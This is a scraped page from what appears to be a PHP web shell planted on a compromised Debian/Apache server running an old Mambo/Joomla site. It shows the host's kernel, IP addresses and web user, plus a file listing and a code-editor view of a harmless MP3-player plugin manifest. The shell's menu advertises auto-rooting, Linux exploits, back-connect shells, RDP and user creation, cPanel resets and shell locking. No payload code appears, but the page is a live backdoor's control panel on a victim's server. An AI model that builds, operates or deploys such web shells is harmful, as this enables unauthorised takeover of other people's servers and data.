Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 13.59.250.115
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dialektologia /
web /
mambots /
content /
[ HOME SHELL ]
Name
Size
Permission
Action
geshi
[ DIR ]
drwxr-xr-x
jtips
[ DIR ]
drwxr-xr-x
mediaplayer
[ DIR ]
drwxr-xr-x
mmp3
[ DIR ]
drwxr-xr-x
smoothgallery
[ DIR ]
drwxr-xr-x
_smoothgallery.php
3.69
KB
-rw-r--r--
_vidmik.php
3.59
KB
-rw-r--r--
geshi.php
2.65
KB
-rw-r--r--
geshi.xml
629
B
-rw-r--r--
jtips.php
1.95
KB
-rw-r--r--
jtips.xml
903
B
-rw-r--r--
legacybots.php
1.35
KB
-rw-r--r--
legacybots.xml
645
B
-rw-r--r--
mmp3.php
23.12
KB
-rw-r--r--
mmp3.xml
14.92
KB
-rw-r--r--
moscode.php
2.9
KB
-rw-r--r--
moscode.xml
636
B
-rw-r--r--
mosemailcloak.php
5.46
KB
-rw-r--r--
mosemailcloak.xml
916
B
-rw-r--r--
mosimage.php
7.18
KB
-rw-r--r--
mosimage.xml
1017
B
-rw-r--r--
mosloadposition.php
3.33
KB
-rw-r--r--
mosloadposition.xml
1.07
KB
-rw-r--r--
mospaging.php
6.9
KB
-rw-r--r--
mospaging.xml
1.11
KB
-rw-r--r--
mossef.php
2.78
KB
-rw-r--r--
mossef.xml
706
B
-rw-r--r--
mosvote.php
2.79
KB
-rw-r--r--
mosvote.xml
633
B
-rw-r--r--
smoothgallery.php
3.81
KB
-rw-r--r--
smoothgallery.xml
7.35
KB
-rw-r--r--
vidmik.php
4.22
KB
-rw-r--r--
vidmik.xml
576
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mmp3.xml
<?xml version="1.0" encoding="iso-8859-1"?> <mosinstall group="content" type="mambot"> <name>Mini-MP3-Player</name> <author>Ute Jacobi</author> <copyright>(C) 2005 Ute Jacobi</copyright> <license>jahoART commercial-License</license> <authorEmail>jtools@jahoart.eu</authorEmail> <authorUrl>www.jahoart.eu</authorUrl> <creationDate>Oktober 2005, current version jul 2007</creationDate> <version>2.2</version> <description> <![CDATA[ <script type="text/javascript"> function show (obj){ obj = document.getElementById(obj); if (obj.style.display == "none"){ obj.style.display = "block"; }else{ obj.style.display = "none"; } } </script> <style type="text/css"> .bg {background-color: rgb(255, 255, 255);} .title {font-size: 18px;} .tab {margin-top:10px;padding:4px;cursor:pointer;border:1px solid #ccc;} .content {border-top:1px solid #ccc;} </style> <div class="bg"><p class="title"><img style="width: 200px; height: 121px;" alt="Mini-MP3-Player" src="../mambots/content/mmp3/mmp3logo.gif" align="middle" /> <span style="color: rgb(204, 0, 0);">M</span>ini-<span style="color: rgb(204, 0, 0);">M</span>P3-<span style="color: rgb(204, 0, 0);">P</span>layer v2.2<small><span class="title"> </span></p><p>The global parameters can by be made over to optional parameters in the string.<br />Optional parameters have priority with global parameters.<br /></p><p>Using Mini-MP3-Player to play MP3 files in Mambo, Joomla or Elxis.</p><div class="tab"><a href=# onclick="show('c1')"><strong>» mmp3 string examples - audio internal</strong></a><div class="content" id="c1" style="display:none"><p>PLAYER = angular1.swf or angular2.swf or round1.swf or round2.swf or audioplayer.swf<br />FILE = mp3 File (any.mp3)<br />TITLE = The text of the Title-Tag</p><p><u>Default</u><br /><strong>{mmp3}FILE{/mmp3}</strong><br /><br /><u>Player: variable / Title-Tag: default</u><br /><strong>{mmp3}PLAYER|FILE{/mmp3}</strong><br /><br /><u>Player: variable / Title-Tag: variable</u><br /><strong>{mmp3}PLAYER|FILE|TITLE{/mmp3}</strong><br /><br />It is important for barrier free pages to use different titles.</p></div></div><div class="tab"><a href=# onclick="show('c11')"><strong>» mmp3 string examples - audio external </strong></a><div class="content" id="c11" style="display:none"><p>URL = complete path to the mp3 file (www.example.tld <strong>NOT</strong><span style="color: rgb(204, 0, 0);"> http://</span>www.example.tld)</p><p>PLAYER = angular1.swf or angular2.swf or round1.swf or round2.swf or audioplayer.swf</p><p>TITLE = The text of the Title-Tag</p><p><u>Default</u><br /><strong>{mmp3ex}URL{/mmp3ex}</strong><br /><br /><u>Player: variable / Title-Tag: default</u><br /><strong>{mmp3ex}PLAYER|URL{/mmp3ex}</strong><br /><br /><u>Player: variable / Title-Tag: variable</u><br /><strong>{mmp3ex}PLAYER|URL|TITLE{/mmp3ex}</strong><br /></p></div></div><div class="tab"><a href=# onclick="show('c12')"><strong>» optional parameters - mmp3 audio </strong></a><div class="content" id="c12" style="display:none"><p>directly separately according to the indication of the mp3-file by <b>&</b> are indicated</p><table><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&typ=auto </td><td style="border-bottom:1px solid #ccc;">Playing starts immediately after accessing the site.</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&typ=loop</td><td style="border-bottom:1px solid #ccc;">after play is pressed, the mp3 will be looped until stop is pressed</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&typ=autoloop</td><td style="border-bottom:1px solid #ccc;">plays immediately (no click) and loops until stop is pressed</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&typ=ghostplay </td><td style="border-bottom:1px solid #ccc;">play once, invisible.</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&typ=ghostloop</td><td style="border-bottom:1px solid #ccc;">Loop (no stop), invisible.</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&bc=</td><td style="border-bottom:1px solid #ccc;">color of play-button, use complete HEX value e.g. #003300 <br />(no effect with picture.swf, picture8.swf)..</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&fc= </td><td style="border-bottom:1px solid #ccc;">color of stop-button, use complete HEX value e.g. #003300<br />(no effect with picture.swf, picture8.swf).</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&ph=</td><td style="border-bottom:1px solid #ccc;">height (do not define when using JPEG, mandatory when using GIF,PNG,SWF).</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&pw=</td><td style="border-bottom:1px solid #ccc;">width (do not define when using JPEG, mandatory when using GIF,PNG,SWF).</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;"> </td><td style="border-bottom:1px solid #ccc;">When using these optional parameters both height and width must be defined.</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&uc=no</td><td style="border-bottom:1px solid #ccc;">No update of webbrowser cache default: webbrowser cache will always be updated.</td></tr></table><p><strong>optional Parameters Fullversion</strong></p><table><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&d =<path></td><td style="border-bottom:1px solid #ccc;">directory containing the mp3 files, path going out of the Root<br />(e.g. &d=/songs/mp3/)</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&sg= </td><td style="border-bottom:1px solid #ccc;">GroupID - from which group the file is supposed to be visible</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&su=</td><td style="border-bottom:1px solid #ccc;">UserID - only visible for a certain user</td></tr></table><p><strong>for picture.swf only</strong></p><table><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&play=</td><td style="border-bottom:1px solid #ccc;">image or flashmovie for play button</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&stop= </td><td style="border-bottom:1px solid #ccc;">image or flashmovie for stop button</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;"> </td><td style="border-bottom:1px solid #ccc;">When using these optional parameters both play image and stop image must be defined.</td></tr></table><p><strong>for audioplayer only</strong></p><table><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&art= </td><td style="border-bottom:1px solid #ccc;">choose Player (1 - 6) see Website <a target="_blank" href="http://www.jahoart.eu">www.jahoart.eu</a></td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&id3=</td><td style="border-bottom:1px solid #ccc;">display ID3-Tag (0 or 1) default 0, 1=show ID3</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&t=</td><td style="border-bottom:1px solid #ccc;">Speed of the ID3-Tag display (numeric default=120)</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&pc= </td><td style="border-bottom:1px solid #ccc;">Background color for audioplayer e.g #003300</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&tc= </td><td style="border-bottom:1px solid #ccc;">Text color for ID3-Tag, Playtime, Infotext e.g #003300</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&vc=</td><td style="border-bottom:1px solid #ccc;">Color of the Volumecontrol e.g #003300</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&ic=</td><td style="border-bottom:1px solid #ccc;">Background color for ID3-Tag, Infotext e.g #003300</td></tr><tr><td style="width: 120px;border-bottom:1px solid #ccc;">&dc=</td><td style="border-bottom:1px solid #ccc;">Color of the Dragbutton e.g #003300</td></tr></table></div></div><div class="tab"><a href=# onclick="show('c13')"><strong>» optional parameters - mmp3 audio examples</strong></a><div class="content" id="c13" style="display:none"><p>FILE = mp3 File (any.mp3)<br />PLAYER = angular1.swf or angular2.swf or round1.swf or round2.swf or audioplayer.swf<br />TITLE = The text of the Title-Tag</p><p>Play typ: Loop, Color, Button 20px<br />{mmp3}PLAYER|FILE<strong>&typ=loop&bc=#009900&fc=#006600&ph=20&pw=20</strong>|TITLE{/mmp3}<br /><br />Using MP3 from the directory indicated in d= .<br />{mmp3}PLAYER|FILE<strong>&d=/song/mp3/</strong>|TITLE{/mmp3}<br /><br />Only user with ID 21 can see this.<br />{mmp3}PLAYER|FILE<strong>&su=21</strong>|TITLE{/mmp3}<br /><br />Audioplayer Art 4,show ID3 information<br />{mmp3}audioplayer.swf|FILE<strong>&art=4&id3=1</strong>|TITLE{/mmp3}</p></div></div> <p>You find for the Mini-MP3-Player (audio) on the side <a target="_blank" href="http://www.jahoart.eu">jahoART</a> the MMP3-String-Builder. This makes easier arranging the string for yours Contents.<br />!!! <span style="color: rgb(204, 0, 0)">Not</span> using the character <span style="color: rgb(204, 0, 0)"><strong>" ' | </strong></span>(Quotation mark, apostrophe, Pipe) in the titletext !!!</p><p>Basis Version: angular1, angular2, round1, round2<br />Fullversion: angular1, angular2, round1, round2, picture, audioplayer</p><hr size="1" noshade="noshade" /><p>© Copyright Ute Jacobi<br />MMP3 Basis work is licensed under a <a href="../mambots/content/mmp3/jahoARTncLizDe.htm" target="_blank">jahoART Non-commercial-Lizenz</a>.<br />MMP3 Full work is licensed under a <a href="../mambots/content/mmp3/jahoARTcLizDe.htm" target="_blank">jahoART commercial-Lizenz</a>.</p> ]]> </description> <files> <filename mambot="mmp3">mmp3.php</filename> <filename>mmp3/angular1.swf</filename> <filename>mmp3/angular2.swf</filename> <filename>mmp3/round1.swf</filename> <filename>mmp3/round2.swf</filename> <filename>mmp3/mmp3logo.gif</filename> <filename>mmp3/notfound.mp3</filename> <filename>mmp3/notfound_de.mp3</filename> <filename>mmp3/jahoARTcLizDe.htm</filename> <filename>mmp3/jahoARTncLizDe.htm</filename> <filename>mmp3/mmp3_fixie.js</filename> <filename>mmp3/index.html</filename> </files> <params> <param name="player" type="list" default="1" label="Default Player Button" description=" Selection button in the content to be indicated is."> <option value="angular1.swf">------------</option> <option value="angular1.swf">angular 1</option> <option value="angular2.swf">angular 2</option> <option value="round1.swf">round 1</option> <option value="round2.swf">round 2</option> <option value="audioplayer.swf">Audioplayer (only Full version)</option> </param> <param name="vtitle" type="radio" default="1" label="Title-Tag" description="Default - the same Title-Tag is always used, Variable - the Title-Tag is also handed over in the plugin string"> <option value="0">Default</option> <option value="1">Variable</option> </param> <param name="titletext" type="text" default="Play Sound" label="Title-Tag" description="Default Title-Tag"/> <param name="sstream" type="radio" default="0" label="MP3 Stream" description="Default - yes, no - no MP3 Stream"> <option value="0">Yes</option> <option value="1">No</option> </param> <param name="strans" type="radio" default="0" label="Transparenz" description="Default - no, yes - Transparency switch on (only with round Player necessarily) "> <option value="1">Yes</option> <option value="0">No</option> </param> <param name="sembed" type="radio" default="0" label="embed-Element" description="Default - no, yes - object-Element embed (old Netscape syntax) add. They produce thereby however a not valides HTML."> <option value="1">Yes</option> <option value="0">No</option> </param> <param name="@spacer" type="spacer" default="" label="" description="" /> <param name="path" type="text" default="images/stories/mp3" label="Path to the MP3" description="Path to the MP3 files, on the basis of Mambo/Joomla/Elxis root."/> <param name="picpath" type="text" default="images/stories/pic" label="Path to the Picture" description="Path to the Picture, on the basis of Mambo/Joomla/Elxis root."/> <param name="@spacer" type="spacer" default="" label="" description="" /> <param name="width" type="text" default="15" label="Width" description="Width Playbutton"/> <param name="height" type="text" default="15" label="Height" description="Height Playbutton"/> <param name="fc" type="text" default="0" label="Foreground" description="Foreground Button."/> <param name="bc" type="text" default="0" label="Background" description="Background Button."/> <param name="bgcolor" type="text" default="#ffffff" label="Background colour" description="Background colour of the Players if transparency switched off ."/> <param name="@spacer" type="spacer" default="" label="more parameters (Full version):" description="All following parameters are effective only in the full version." /> <param name="regstr" type="text" default="Only for registered users" label="Display Text" description="Text which is supposed to be indicated instead of the button if the display was restricted to certain groups or users"/> <param name="@spacer" type="spacer" default="" label="Settings for Audioplayer" description="" /> <param name="aart" type="list" default="1" label="choose Player" description="Default: Audioplayer 1 / Kind of the display of the Audioplayers in the Content"> <option value="1">Audioplayer 1</option> <option value="2">Audioplayer 2</option> <option value="3">Audioplayer 3</option> <option value="4">Audioplayer 4</option> <option value="5">Audioplayer 5</option> <option value="6">Audioplayer 6</option> </param> <param name="pc" type="text" default="0" label="Background color for audioplayer" description="complete hexadecimal value e.g #003300"/> <param name="tc" type="text" default="0" label="Text color" description=" for ID3-Tag, Playtime, Infotext, complete hexadecimal value e.g #003300"/> <param name="vc" type="text" default="0" label="Color of the Volumecontrol" description="complete hexadecimal value e.g #003300"/> <param name="ic" type="text" default="0" label="Background color for ID3-Tag, Infotext" description="complete hexadecimal value e.g #003300"/> <param name="dc" type="text" default="0" label="Color of the Dragbutton" description="complete hexadecimal value e.g #003300"/> <param name="id3show" type="radio" default="0" label="display ID3-Tag" description="Default - no, Display der ID3-Tag Information. Artist,Album,Title,Time"> <option value="1">Yes</option> <option value="0">No</option> </param> <param name="id3tempo" type="text" default="120" label="Speed of the ID3-Tag display" description="Default: 120 /numeric."/> <param name="@spacer" type="spacer" default="" label="" description="" /> <param name="lizcode" type="text" default="" label="License key" description="give your license key here"/> </params> </mosinstall>
Close